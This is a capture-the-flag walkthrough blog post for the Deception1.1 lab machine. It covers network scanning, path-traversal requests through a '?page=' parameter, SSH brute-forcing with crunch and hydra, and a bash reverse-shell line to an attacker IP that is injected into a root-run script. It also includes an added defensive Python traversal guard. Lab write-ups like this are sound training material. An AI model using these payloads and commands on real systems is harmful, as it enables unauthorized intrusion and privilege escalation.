haclabs: deception1.1 Walkthrough

Dark-0
4 min read · Dec 22, 2020

Description

This machine is the next part of the Deception machine. This time, try harder to get root!

To complete this challenge you need to find 3 flags.

flag 2 : Password to unzip the zip file.

flag 1 : Present in /home/yash/

flag 0 : Present in /root/

This is a beginner/intermediate level machine.

Step 1:-

I found “646563657074696f6e312e31” while creating the machine.

This value is actually a hex-encoded string.

FLAG 2: Password to unzip the file, “deception1.1”

Network Scanning

We always start with network scanning. Let’s find the target IP address by running netdiscover.

$ sudo netdiscover -i vboxnet0 -r 10.10.10.1/16

As we saw in the netdiscover result, our target IP address is 10.10.10.18.

Enumeration/Reconnaissance

Our next step is scanning the target machine. Let’s start with nmap.

$ nmap -p- -sV 10.10.10.18

The nmap result reveals that two ports are open on the target machine: port 80 (HTTP, web) and port 22 (SSH).

Let’s visit port 80 quickly.

A password strength checker..!!!!

Okay, let’s check dark0:dark0222@@@S.

I think there is something juicy in this 0000flagflagflagflag.php. Okay..!!! Let’s continue.

UMMMM…!!!! Password is strong… that’s cool. But “flag=1”.

Hey, 0000flagflagflagflag.php and “flag=1”…

I replaced every “flag” with 1, and look what we found.

http://10.10.10.18/00001111.php

Let’s view the source code of the same page: view-source:http://10.10.10.18/00001111.php

Okay, now one thing is clear: we have to find a file named “password.txt”, and we have to use “?page=” to read it.

I tried 00001111.php?page=password.txt but it didn’t work, so I tried ../password.txt, then ../../password.txt, and finally it worked.
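That “?page=” parameter is a classic file include with path traversal: the script opens whatever name it is given, so “../../password.txt” walks out of the web root. As an added example (not part of the original walkthrough and not the machine’s PHP), here is the check a defender would put in front of such an include, plus a detector for the same pattern in access-log request lines; the web-root layout and the log lines are constructed assumptions.

```python
"""Guarding a `?page=` include against path traversal, plus a log check.
Added example (not the machine's own PHP); web-root layout and log lines
are constructed assumptions."""
import os
import tempfile
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlparse


def safe_page_path(web_root: str, page: str) -> Optional[str]:
    """Return the absolute path for `page` only if it stays inside web_root.
    realpath() collapses `..` segments and symlinks, so the comparison is
    done on canonical paths rather than on the raw user-supplied string."""
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, page))
    # commonpath, not startswith: "/srv/site" must not accept "/srv/site2/x".
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def traversal_in_request(request_line: str) -> bool:
    """True when the request's `page` parameter contains a `..` segment.
    parse_qs percent-decodes values, so `..%2F..%2F` is caught as well."""
    target = request_line.split()[1]  # "GET <target> HTTP/1.1"
    query = parse_qs(urlparse(target).query)
    return any(".." in value.split("/") for value in query.get("page", []))


# Constructed access-log request lines, not captured from the machine.
SAMPLE_REQUESTS: List[str] = [
    "GET /00001111.php?page=password.txt HTTP/1.1",
    "GET /00001111.php?page=../password.txt HTTP/1.1",
    "GET /00001111.php?page=..%2F..%2Fpassword.txt HTTP/1.1",
    "GET /index.php HTTP/1.1",
]


def demo() -> Dict[str, bool]:
    """Run the include guard against the three values probed in the walkthrough,
    inside a throwaway web root so the example runs offline."""
    with tempfile.TemporaryDirectory() as tmp:
        web_root = os.path.join(tmp, "var", "www", "html")
        os.makedirs(web_root)
        probes = ["password.txt", "../password.txt", "../../password.txt"]
        return {p: safe_page_path(web_root, p) is not None for p in probes}


if __name__ == "__main__":
    print(demo())  # {'password.txt': True, '../password.txt': False, '../../password.txt': False}
    print([traversal_in_request(r) for r in SAMPLE_REQUESTS])  # [False, True, True, False]
```

Only the first probe is allowed through; both traversal variants are rejected, and the percent-encoded form in the log is flagged the same as the plain one.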

Here we got a username and the first four characters of a six-character password, so we have to find the last two. We can use crunch to make a password wordlist (each @ in the pattern below stands for one lowercase letter).

$ crunch 6 6 -t ya5h@@ -o wordlist.txt

Let’s now brute force SSH using my favourite tool, “hydra”.

$ hydra -l yash -P wordlist.txt ssh://10.10.10.18

Luckily, we found the user’s credentials:

Username :- yash

Password :- ya5hay

$ ssh yash@10.10.10.18

Here we have our flag0.txt:

L3lhc2hhbmlzaC5waHA=

Way to root…!!!

We have a .sh file, perm.sh; let’s inject our reverse shell to get a root shell…!

We can add any reverse shell, Python, bash or any other. I’m using a bash reverse shell.

$ vi perm.sh

#!/bin/bash
bash -i >& /dev/tcp/10.10.10.1/1234 0>&1

After editing the .sh file, turn on a listener and wait for root’s connection…..!!!!!

That’s it..!! Thanks for reading. Stay tuned for similar walkthroughs and much more.

:- Dark-0

Dark-0

Learning stuffs in Cybersecurity, Preparing for OSCP certification. #penetration_tester, CTF Player, Bug Hunter. https://twitter.com/dark0sombre